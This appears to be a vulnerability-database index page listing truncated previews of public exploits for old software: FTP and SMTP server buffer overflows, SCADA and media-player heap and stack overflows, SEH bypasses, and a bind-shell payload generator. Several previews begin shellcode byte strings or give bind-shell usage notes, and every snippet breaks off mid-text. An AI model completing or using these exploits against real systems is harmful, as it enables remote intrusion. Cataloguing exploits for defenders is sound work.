EUVD-2005-0905
Malware in sbrugna...
Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit
No description provided by source. Ability Ftp Server 2.34 Remote exploit in APPE command discovered,exploited by KaGra Use it with netcat: exploit.py|nc host 21 BindShell at port 4444,one shot OnLy! import struct shell = \xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66 shell +=...
KingView 6.5.3 SCADA HMI Heap Overflow PoC
No description provided by source. Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC Date: 9/28/2010 Author: Dillon Beresford Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53EN.rar Version: 6.53 English Tested on: Windows XP SP1 works on SP2 an...
Huawei Technologies Internet Mobile - Unicode SEH Exploit
No description provided by source. #!/usr/bin/perl Souhail Hammou - Independent Security Researcher & Penetration Tester. Facebook: www.facebook.com/dark.puzzle.sec E-mail: [email protected] Greetings to all Moroccan researchers and white hats. Vulnerable: Etisalat, Vodafone, Meditel,...
Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit
No description provided by source. #!/usr/bin/python Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret to work correctly despite the large number of usable addresses that were tested. $ ./kolibri.py 192.168.1.146 8080 Kolibri+...
Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/21085/info Universal FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions. An attacker can exploit these issues to crash the affected...
NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
No description provided by source. Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit Date: 10/31/2011 Author: Dillon Beresford Twitter: https://twitter.com/!/D1N Software Link: http://www.njstar.com/download/njcom.exe Version: 3.00 and prior Build: 11818 and prior Tested on:...
Huawei Technologies Internet Mobile - Unicode (SEH)
Huawei Technologies Internet Mobile - Unicode SEH #!/usr/bin/perl Souhail Hammou - Independent Security Researcher & Penetration Tester. Facebook: www.facebook.com/dark.puzzle.sec E-mail: [email protected] Greetings to all Moroccan researchers and white hats. Vulnerable: Etisalat, Vodafone...
ZipItFast PRO 3.0 Heap Overflow
#!/usr/bin/perl --------------------------------------------------------------------------- Exploit: ZipItFast PRO v3.0 Heap-Overflow Author: b33f - http://www.fuzzysecurity.com/ OS: Windows XP SP1 DOS POC: C4SS!0 G0M3S = http://www.exploit-db.com/exploits/17512/ Software:...
ZipItFast PRO 3.0 - Local Heap Overflow
#!/usr/bin/perl --------------------------------------------------------------------------- Exploit: ZipItFast PRO v3.0 Heap-Overflow Author: b33f - http://www.fuzzysecurity.com/ OS: Windows XP SP1 DOS POC: C4SS!0 G0M3S = http://www.exploit-db.com/exploits/17512/ Software:...
KingView 6.5.3 - SCADA HMI Heap Overflow
Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC Date: 9/28/2010 Author: Dillon Beresford Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53EN.rar Version: 6.53 English Tested on: Windows XP SP1 works on SP2 and SP3 will release new targets afte...
McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write
GOODFELLAS Security Research TEAM http://goodfellas.shellcode.com.ar Greetings to str0ke McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write ============================================================================== Internal ID: VULWAR20090616. -----------...
windows xp/sp1 generate portbind payload
windows xp/sp1 generate portbind payload. Shellcode exploit for generator platform http://www.shell-storm.org/shellcode/ / function syntax echo "\nSyntax:\nroot@laptop:/ php ./payload.php \n\n"; function win32bind$port if$port 65535 || $port 4100 echo "Erreur Port\nSelect a port between 4100 and...
VLC Media Player TY File Stack Based Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ============================================================ VLC Media Player TY File Stack Based Buffer Overflow Exploit ============================================================ #!/usr/bin/perl 10/21/2008 ksOSe use warnings; use strict;...
Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)
EMR_COLORMATCHTOTARGETW stack buffer overflow exploit By Ac!dDrop This is one of the 2 Vulnerabilities of MS08-021 Tested on Windows xp professional SP1 GDi32.dll 5.1.2600.1106 kernel32.dll 5.1.2600.1106 ws2_32.dll 5.1.2600.0 calc.zip--- executes calculator IE.zip and localhost.zip ------ connects ...
FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)
#!/usr/bin/perl ksOSe 08/17/2008 bypass safeseh using flash9f.ocx. use warnings; use strict; use IO::Socket; win32exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b"...
MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)
No description provided by source. / HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 Copyright c 2005 houseofdabus. MS05-039 Microsoft Windows Plug-and-Play Service Remote Overflow Universal Exploit + no crash shellcode .:: houseofdabus ::...
WS_FTP Server <= 4.0.2 ALLO Remote Buffer Overflow Exploit
No description provided by source. / Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit c2004 Hugh Mann [email protected] This exploit has been tested with WS_FTP Server 4.0.2.EVAL, Windows XP SP1 NOTE: - The exploit assumes the user has a total file size limit. If the user only has...
Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
#!/usr/bin/python Kantaris 0.3.4 Media Player Local Buffer Overflow 0day! The following exploit will make a film.ssa file, just rename the file with the name of your movie, and use your imagination to pwn! : Shellcode is local bind shell, just telnet to port:4444 to get command prompt : BIG thanks...
Microsoft Excel rtAFDesc record invalid pointer access
Added: 01/17/2008 CVE: CVE-2008-0081 BID: 27305 OSVDB: 40344 Background Microsoft Excel, part of the Microsoft Office product suite, is a spreadsheet application for Windows platforms. Problem Microsoft Excel references an uninitialized pointer if a spreadsheet contains an improperly placed...